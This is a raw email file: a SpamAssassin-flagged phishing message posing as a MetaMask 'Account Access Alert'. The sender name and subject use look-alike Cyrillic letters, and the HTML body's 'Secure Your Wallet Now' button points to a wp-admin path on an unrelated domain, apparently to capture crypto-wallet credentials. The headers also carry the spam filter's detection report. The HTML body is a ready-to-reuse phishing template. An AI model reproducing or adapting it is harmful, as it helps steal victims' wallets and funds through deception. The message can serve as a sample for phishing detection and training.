Return-Path: <postmaster@2778ebf812.nxcli.io>
Delivered-To: info@tictactocsaintcanut.com
Received: from cl-t211-187cl.majeunesse.ca
	by cl-t211-187cl.majeunesse.ca with LMTP
	id UCgDKvXNfWicIAAAV5eKQw
	(envelope-from <postmaster@2778ebf812.nxcli.io>)
	for <info@tictactocsaintcanut.com>; Mon, 21 Jul 2025 01:19:49 -0400
Return-path: <postmaster@2778ebf812.nxcli.io>
Envelope-to: info@tictactocsaintcanut.com
Delivery-date: Mon, 21 Jul 2025 01:19:49 -0400
Received: from cloudhost-1920807.us-midwest-1.nxcli.net ([209.87.159.232]:40922)
	by cl-t211-187cl.majeunesse.ca with esmtps  (TLS1.2) tls TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
	(Exim 4.96.2)
	(envelope-from <postmaster@2778ebf812.nxcli.io>)
	id 1udiwH-0002A6-1p
	for info@tictactocsaintcanut.com;
	Mon, 21 Jul 2025 01:19:49 -0400
Comment: DomainKeys? See http://domainkeys.sourceforge.net/
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=default; d=2778ebf812.nxcli.io;
  b=dc4RGV5RirJ0fVYckpFmkm0M3EVPMQQEtJP4j+K8Unom8iToGe7VrjFW2T54mNMwfHs+tvEpWjRq2rD5ouflKnPJRR+6lJpMrm+KuNjC1mjUIP/Z2zQ9qk2WAdckN4S3jPRvEr251RkvzgK4PySXc2WejVfmujELjxuxS4bQW4mDsW2CaNKktKbOWTukJHRpF3oE+z1hg/7taku+i6INCFxcs2GUUjgvAKQGvVBCQfqoyqTpF/Nvv7AzB9vqj8c7T/fWHC5qrEb8Of8qsTMNdX1GVVduEorsfXsRIIa5sNeCKSEkhbjTE3VmIGGzKJzgX86MwLIKtrN9DfIp72ge5A==;
  h=Received:Date:Message-ID:To:Subject:X-PHP-Originating-Script:From:Reply-To:MIME-Version:Content-Type:X-Mailer:X-Priority:List-Unsubscribe;
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed; d=2778ebf812.nxcli.io; h=
	date:message-id:to:subject:from:reply-to:mime-version
	:content-type:list-unsubscribe; s=default; bh=sz4qc/WtXFjHtL+nHP
	TL3ViE4JnvSzGFoa2WiEKdkug=; b=pBeyaQO+OJP63RYE7okjS98rbFwdDDNBGK
	g2fKbD2wONjW6XYg76ghY+SIflHypH0HZNY0RLnA9bH8g3X1YJ425IbnCHmgkN1e
	E6cSkEFP5eZR3MjsJaHVJhNWlWAv9V08XUOTmTrEdhH8uVMbOauF00VraO959LZZ
	r5o6bhhax7IG4RmLjgJGJCbYHaEB+fqrpgB8Ftw9d/deWdK2c3tdYavYpd5Zj3ho
	d5hnm74cTQUBzX97MbHufQnsN7aQyXEU78vKlEgzKeU8DYUD7ZTjEbHGzsQ+qKxE
	gAtzaaInuDcgnD8JrKRZ3IK8fwBv5FVZg0+6Cg5qjBkmCRyYnCfw==
Received: (qmail 1512 invoked by uid 10201); 21 Jul 2025 05:19:04 +0000
Date: 21 Jul 2025 05:19:04 +0000
Message-ID: <20250721051904.1510.qmail@cloudhost-1920807.us-midwest-1.nxcli.net>
To: info@tictactocsaintcanut.com
X-PHP-Originating-Script: 10201:you.php
From: "MetаMаsk" <00832r17@qbn.io>
Reply-To: 00832r17@qbn.io
MIME-Version: 1.0
Content-Type: text/html; charset=UTF-8
X-Mailer: PHP/8.2.20
X-Priority: 3
List-Unsubscribe: <mailto:unsubscribe@00832r17@qbn.io>
X-Spam-Status: Yes, score=7.7
X-Spam-Score: 77
X-Spam-Bar: +++++++
X-Spam-Report: Spam detection software, running on the system "cl-t211-187cl.majeunesse.ca",
 has identified this incoming email as possible spam.  The original
 message has been attached to this so you can view it or label
 similar future email.  If you have any questions, see
 root\@localhost for details.
 Content preview:  Account Access Alert 🦊 Account Access Alert We’ve noticed
    a login from a device or location we don’t recognize. For your security,
    please review this activity. 
 Content analysis details:   (7.7 points, 5.0 required)
  pts rule name              description
 ---- ---------------------- --------------------------------------------------
  0.0 URIBL_BLOCKED          ADMINISTRATOR NOTICE: The query to URIBL was
                             blocked.  See
                             http://wiki.apache.org/spamassassin/DnsBlocklists#dnsbl-block
                              for more information.
                             [URIs: nxcli.io]
  0.0 RCVD_IN_VALIDITY_RPBL_BLOCKED RBL: ADMINISTRATOR NOTICE: The
                             query to Validity was blocked.  See
                             https://knowledge.validity.com/hc/en-us/articles/20961730681243
                              for more information.
                            [209.87.159.232 listed in bl.score.senderscore.com]
  0.0 RCVD_IN_VALIDITY_SAFE_BLOCKED RBL: ADMINISTRATOR NOTICE: The
                             query to Validity was blocked.  See
                             https://knowledge.validity.com/hc/en-us/articles/20961730681243
                              for more information.
                         [209.87.159.232 listed in sa-trusted.bondedsender.org]
  0.6 FROM_STARTS_WITH_NUMS  From: starts with several numbers
  0.1 HEADER_FROM_DIFFERENT_DOMAINS From and EnvelopeFrom 2nd level
                             mail domains are different
  2.6 FUZZY_WALLET           BODY: Obfuscated "Wallet"
  0.1 MIME_HTML_ONLY         BODY: Message only has text/html MIME parts
  0.0 HTML_MESSAGE           BODY: HTML included in message
  0.0 HTML_FONT_LOW_CONTRAST BODY: HTML font color similar or
                             identical to background
  0.1 DKIM_SIGNED            Message has a DKIM or DK signature, not necessarily
                             valid
  2.4 RAZOR2_CF_RANGE_51_100 Razor2 gives confidence level above 50%
                             [cf: 100]
  1.7 RAZOR2_CHECK           Listed in Razor2 (http://razor.sf.net/)
  0.0 KAM_DMARC_STATUS       Test Rule for DKIM or SPF Failure with Strict
                             Alignment
  0.1 DKIM_INVALID           DKIM or DK signature exists, but is not valid
X-Spam-Flag: YES
Subject:  ***SPAM***  Wаllet Login Attempt – Vеrification Needed


<!DOCTYPE html>
<html lang="en" >
<head>
  <meta charset="UTF-8" />
  <title>Account Access Alert</title>
</head>
<body style="margin:0; padding:20px; font-family:Arial, sans-serif; background:#f9fafb; color:#222222;">
  <table role="presentation" width="100%" cellpadding="0" cellspacing="0" style="max-width:540px; margin: auto; background:#ffffff; border:1px solid #ddd; border-radius:8px;">
    <tr>
      <td style="padding: 28px; text-align:center;">
        <span style="font-size:32px; display:block; line-height:1;">&#129418;</span>
        <h1 style="color:#f6851b; font-weight:600; margin:16px 0 24px; font-size:22px;">Account Access Alert</h1>
        <p style="font-size:16px; line-height:1.5; margin:0 0 22px;">
          We’ve noticed a login from a device or location we don’t recognize. For your security, please review this activity.
        </p>

        <table role="presentation" cellpadding="0" cellspacing="0" style="margin: 24px auto 16px;">
          <tr>
            <td align="center" bgcolor="#f6851b" style="border-radius:6px;">
              <a href="https://jiolostfound.anshuwap.com/wp-admin?id=2260025292357087612-6629" target="_blank" rel="noopener noreferrer" style="font-size:16px; color:#fff; text-decoration:none; padding: 14px 40px; display:inline-block; font-weight:700; font-family:Arial, sans-serif; letter-spacing: 0.03em; user-select:none;">
                &#8203;Secure Your Wallet Now&#8203;
              </a>
            </td>
          </tr>
        </table>

        <p style="font-size:13px; color:#888; margin-top:20px; font-style:italic;">
          If this was you, you don’t need to do anything further. Thank you for helping us keep your account safe.
        </p>
        <p style="font-size:12px; color:#bbb; margin-top:40px; user-select:none;">
          — MetaMask Security Team
        </p>
      </td>
    </tr>
  </table>
</body>
</html>

